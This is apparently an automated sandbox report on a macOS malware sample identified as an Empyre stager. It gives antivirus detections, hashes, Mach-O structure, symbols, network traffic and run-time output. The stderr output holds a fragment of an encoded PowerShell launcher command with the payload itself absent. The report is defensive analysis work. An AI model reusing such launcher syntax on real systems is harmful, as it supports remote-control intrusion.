Analysis Report SwWPxGBaKt.macho
Overview
General Information
Detection
Score: | 60 |
Range: | 0 - 100 |
Whitelisted: | false |
Signatures
Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Process executable has a file extension which is uncommon (probably to disguise the executable)
Contains symbols with paths
Classification
Startup |
---|
|
Yara Overview |
---|
No yara matches |
---|
Signature Overview |
---|
AV Detection: |
---|
Antivirus / Scanner detection for submitted sample |
Source: | Avira: |
Multi AV Scanner detection for submitted file |
Source: | Virustotal: | Perma Link |
Source: | ReversingLabs: |
Source: | TCP traffic detected without corresponding DNS query: |
Source: | TCP traffic detected without corresponding DNS query: |
Source: | TCP traffic detected without corresponding DNS query: |
Source: | TCP traffic detected without corresponding DNS query: |
Source: | TCP traffic detected without corresponding DNS query: |
Source: | TCP traffic detected without corresponding DNS query: |
Source: | TCP traffic detected without corresponding DNS query: |
Source: | UDP traffic detected without corresponding DNS query: |
Source: | String found in binary or memory: |
Source: | String found in binary or memory: |
Source: | String found in binary or memory: |
Source: | String found in binary or memory: |
Source: | String found in binary or memory: |
Source: | String found in binary or memory: |
Source: | Network traffic detected: |
Source: | Network traffic detected: |
Source: | Classification label: |
Source: | Mach-O symbol: |
Source: | Mach-O symbol: |
Source: | Mach-O symbol: |
Source: | Mach-O symbol: |
Source: | Stderr: File '<string>'; line 1 wershell -noP -sta -w 1 -enc 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 ^SyntaxError: invalid syntax: |
Hooking and other Techniques for Hiding and Protection: |
---|
Process executable has a file extension which is uncommon (probably to disguise the executable) |
Source: | Process executable with extension: |
Source: | System or server version plist file read: |
Source: | System or server version plist file read: |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Windows Management Instrumentation | Path Interception | Path Interception | Masquerading1 | OS Credential Dumping | System Information Discovery1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Encrypted Channel1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Rootkit | LSASS Memory | Application Window Discovery | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Application Layer Protocol1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Behavior Graph |
---|
Screenshots |
---|
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
| 33% | Virustotal | | Browse |
| 45% | ReversingLabs | MacOS.Trojan.Empr | |
| 100% | Avira | OSX/Empr.vpkof | |
Dropped Files |
---|
No Antivirus matches |
---|
Domains |
---|
No Antivirus matches |
---|
URLs |
---|
No Antivirus matches |
---|
Domains and IPs |
---|
Contacted Domains |
---|
No contacted domains info |
---|
URLs from Memory and Binaries |
---|
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
| | false | | high |
Contacted IPs |
---|
Public |
---|
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
17.171.27.65 | unknown | United States | | 714 | APPLE-ENGINEERINGUS | false |
17.253.109.202 | unknown | United States | | 6185 | APPLE-AUSTINUS | false |
2.22.90.177 | unknown | European Union | | 20940 | AKAMAI-ASN1EU | false |
General Information |
---|
Joe Sandbox Version: | 31.0.0 Emerald |
Analysis ID: | 538 |
Start date: | 08.04.2021 |
Start time: | 10:55:14 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 3m 36s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | SwWPxGBaKt.macho |
Cookbook file name: | defaultmacfilecookbook.jbs |
Analysis system description: | Virtual Machine, High Sierra (Office 2016 v16.16, Java 11.0.2+9, Adobe Reader 2019.010.20099) |
Analysis Mode: | default |
Detection: | MAL |
Classification: | mal60.evad.macMACHO@0/0@0/0 |
Warnings: | |
Joe Sandbox View / Context |
---|
IPs |
---|
No context |
---|
Domains |
---|
No context |
---|
ASN |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
AKAMAI-ASN1EU | | Get hash | malicious | Browse | |
JA3 Fingerprints |
---|
No context |
---|
Dropped Files |
---|
No context |
---|
Runtime Messages |
---|
Command: | /Users/berri/Desktop/SwWPxGBaKt.macho |
Exit Code: | 0 |
Exit Code Info: | |
Killed: | False |
Standard Output: | |
Standard Error: | File '<string>'; line 1 wershell -noP -sta -w 1 -enc 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 ^ SyntaxError: invalid syntax |
Created / dropped Files |
---|
No created / dropped files found |
---|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 3.354292401855357 |
TrID: |
|
File name: | SwWPxGBaKt.macho |
File size: | 25104 |
MD5: | 480e81fbccf44939cf4ad4d21f9ba230 |
SHA1: | ff68dd82ddd872b04b8605adfc7be8f42bb38b0e |
SHA256: | c364dcfa20543edbe9af0c94bedab5d79002277f97dfcbea3a704e5b4f1088e9 |
SHA512: | e914e4dd698df816540b41bbdfa4f342dbc6ebe49e7b2b46e5c8b25fb7b61b4cdcb45b87baec355c3ff3efb30fe6b78dd1037d3616e15dd31d48120e45f0557c |
SSDEEP: | 384:dWvPTo8CduyVFwZqbOpFZ4wYMj+iOPZf6QTN:dQs8SucCqbqZ4vMHQT |
File Content Preview: | ....................P..... .........H...__PAGEZERO..............................................................__TEXT................... ............... ......................__text..........__TEXT......................................................... |
Static Mach Info |
---|
General Information for header 1 | |
---|---|
Endian: | |
Size: | |
Architecture: | |
Filetype: | |
Nbr. of load commands: | |
Entry point: |
segment_command_64 aggregated: 4 |
---|
Name | Value |
---|---|
segname | __PAGEZERO |
vmaddr | 0x0 |
vmsize | 0x100000000 |
fileoff | 0x0 |
filesize | 0x0 |
maxprot | 0x0 |
initprot | 0x0 |
nsects | 0 |
flags | 0x0 |
Name | Value |
---|---|
segname | __TEXT |
vmaddr | 0x100000000 |
vmsize | 0x2000 |
fileoff | 0x0 |
filesize | 0x2000 |
maxprot | 0x7 |
initprot | 0x5 |
nsects | 8 |
flags | 0x0 |
Datas |
|
Name | Value |
---|---|
segname | __DATA |
vmaddr | 0x100002000 |
vmsize | 0x1000 |
fileoff | 0x2000 |
filesize | 0x1000 |
maxprot | 0x7 |
initprot | 0x3 |
nsects | 10 |
flags | 0x0 |
Datas |
|
Name | Value |
---|---|
segname | __LINKEDIT |
vmaddr | 0x100003000 |
vmsize | 0x4000 |
fileoff | 0x3000 |
filesize | 0x3210 |
maxprot | 0x7 |
initprot | 0x1 |
nsects | 0 |
flags | 0x0 |
dyld_info_command aggregated: 1 |
---|
Name | Value |
---|---|
rebase_off | 12288 |
rebase_size | 160 |
bind_off | 12448 |
bind_size | 152 |
weak_bind_off | 0 |
weak_bind_size | 0 |
lazy_bind_off | 12600 |
lazy_bind_size | 264 |
export_off | 12864 |
export_size | 128 |
symtab_command aggregated: 1 |
---|
Name | Value |
---|---|
symoff | 13008 |
nsyms | 66 |
stroff | 14164 |
strsize | 1328 |
dysymtab_command aggregated: 1 |
---|
Name | Value |
---|---|
ilocalsym | 0 |
nlocalsym | 45 |
iextdefsym | 45 |
nextdefsym | 5 |
iundefsym | 50 |
nundefsym | 16 |
tocoff | 0 |
ntoc | 0 |
modtaboff | 0 |
nmodtab | 0 |
extrefsymoff | 0 |
nextrefsyms | 0 |
indirectsymoff | 14064 |
nindirectsyms | 25 |
extreloff | 0 |
nextrel | 0 |
locreloff | 0 |
nlocrel | 0 |
dylinker_command aggregated: 1 |
---|
Name | Value |
---|---|
name | 12 |
Datas |
uuid_command aggregated: 1 |
---|
Name | Value |
---|---|
uuid | b'AQ\x8e\xa1\x17.?\x1c\x82\x08\x884\xdc\x9b\xf4\x8c' |
version_min_command aggregated: 1 |
---|
Name | Value |
---|---|
version | 658176 |
sdk | 658176 |
source_version_command aggregated: 1 |
---|
Name | Value |
---|---|
version | 0 |
entry_point_command aggregated: 1 |
---|
Name | Value |
---|---|
entryoff | 2720 |
stacksize | 0 |
dylib_command aggregated: 4 |
---|
Name | Value |
---|---|
name | 24 |
timestamp | Thu Jan 1 01:00:02 1970 |
current_version | 2.7.10 |
compatibility_version | 2.7.0 |
Datas |
Name | Value |
---|---|
name | 24 |
timestamp | Thu Jan 1 01:00:02 1970 |
current_version | 1258.0.0 |
compatibility_version | 300.0.0 |
Datas |
Name | Value |
---|---|
name | 24 |
timestamp | Thu Jan 1 01:00:02 1970 |
current_version | 228.0.0 |
compatibility_version | 1.0.0 |
Datas |
Name | Value |
---|---|
name | 24 |
timestamp | Thu Jan 1 01:00:02 1970 |
current_version | 1226.10.1 |
compatibility_version | 1.0.0 |
Datas |
rpath_command aggregated: 1 |
---|
Name | Value |
---|---|
path | 12 |
Datas |
linkedit_data_command aggregated: 3 |
---|
Name | Value |
---|---|
dataoff | 12992 |
datasize | 16 |
Name | Value |
---|---|
dataoff | 13008 |
datasize | 0 |
Name | Value |
---|---|
dataoff | 15504 |
datasize | 9600 |
Internal Symbols |
---|
-[AppDelegate .cxx_destruct] |
-[AppDelegate .cxx_destruct] |
-[AppDelegate applicationDidFinishLaunching:] |
-[AppDelegate applicationDidFinishLaunching:] |
-[AppDelegate applicationWillTerminate:] |
-[AppDelegate applicationWillTerminate:] |
-[AppDelegate setWindow:] |
-[AppDelegate setWindow:] |
-[AppDelegate window] |
-[AppDelegate window] |
/Users/cross/Documents/PythonInObjc/BundledEmpyreLauncher/EmpyreStager/EmpyreStager/ |
/Users/cross/Documents/PythonInObjc/BundledEmpyreLauncher/EmpyreStager/EmpyreStager/ |
/Users/cross/Library/Developer/Xcode/DerivedData/launcher-fawtdwnnxsoauhdakgxckdmlpaqw/Build/Intermediates/launcher.build/Debug/launcher.build/Objects-normal/x86_64/AppDelegate.o |
/Users/cross/Library/Developer/Xcode/DerivedData/launcher-fawtdwnnxsoauhdakgxckdmlpaqw/Build/Intermediates/launcher.build/Debug/launcher.build/Objects-normal/x86_64/main.o |
AppDelegate.m |
_OBJC_CLASS_$_AppDelegate |
_OBJC_CLASS_$_AppDelegate |
_OBJC_CLASS_$_NSObject |
_OBJC_IVAR_$_AppDelegate._window |
_OBJC_IVAR_$_AppDelegate._window |
_OBJC_METACLASS_$_AppDelegate |
_OBJC_METACLASS_$_AppDelegate |
_OBJC_METACLASS_$_NSObject |
_PyRun_SimpleStringFlags |
_Py_Finalize |
_Py_Initialize |
___stack_chk_fail |
___stack_chk_guard |
__mh_execute_header |
__objc_empty_cache |
_activateStager |
_activateStager |
_main |
_main |
_memcpy |
_objc_autoreleaseReturnValue |
_objc_destroyWeak |
_objc_loadWeakRetained |
_objc_storeStrong |
_objc_storeWeak |
_setlocale |
dyld_stub_binder |
main.m |
External symbols |
---|
_PyRun_SimpleStringFlags |
_Py_Finalize |
_Py_Initialize |
___stack_chk_fail |
_memcpy |
_objc_autoreleaseReturnValue |
_objc_destroyWeak |
_objc_loadWeakRetained |
_objc_storeStrong |
_objc_storeWeak |
_setlocale |
Network Behavior |
---|
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 8, 2021 10:56:08.303731918 CEST | 49238 | 443 | 192.168.11.11 | 17.171.27.65 |
Apr 8, 2021 10:56:08.303963900 CEST | 49238 | 443 | 192.168.11.11 | 17.171.27.65 |
Apr 8, 2021 10:56:08.417180061 CEST | 443 | 49238 | 17.171.27.65 | 192.168.11.11 |
Apr 8, 2021 10:56:08.417249918 CEST | 443 | 49238 | 17.171.27.65 | 192.168.11.11 |
Apr 8, 2021 10:56:08.417785883 CEST | 49238 | 443 | 192.168.11.11 | 17.171.27.65 |
Apr 8, 2021 10:56:32.378993988 CEST | 49247 | 80 | 192.168.11.11 | 17.253.109.202 |
Apr 8, 2021 10:56:32.379209995 CEST | 49248 | 80 | 192.168.11.11 | 2.22.90.177 |
Apr 8, 2021 10:56:32.389942884 CEST | 80 | 49248 | 2.22.90.177 | 192.168.11.11 |
Apr 8, 2021 10:56:32.390476942 CEST | 49248 | 80 | 192.168.11.11 | 2.22.90.177 |
Apr 8, 2021 10:56:32.400599957 CEST | 80 | 49247 | 17.253.109.202 | 192.168.11.11 |
Apr 8, 2021 10:56:32.401242018 CEST | 49247 | 80 | 192.168.11.11 | 17.253.109.202 |
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 8, 2021 10:56:35.845971107 CEST | 57325 | 53 | 192.168.11.11 | 1.1.1.1 |
Apr 8, 2021 10:56:35.852438927 CEST | 53 | 57325 | 1.1.1.1 | 192.168.11.11 |
System Behavior |
---|
General |
---|
Start time: | 10:56:05 |
Start date: | 08/04/2021 |
Path: | /Library/Frameworks/Mono.framework/Versions/4.4.2/bin/mono-sgen32 |
Arguments: | n/a |
File size: | 3722408 bytes |
MD5 hash: | 8910349f44a940d8d79318367855b236 |
General |
---|
Start time: | 10:56:05 |
Start date: | 08/04/2021 |
Path: | /Users/berri/Desktop/SwWPxGBaKt.macho |
Arguments: | /Users/berri/Desktop/SwWPxGBaKt.macho |
File size: | 25104 bytes |
MD5 hash: | 480e81fbccf44939cf4ad4d21f9ba230 |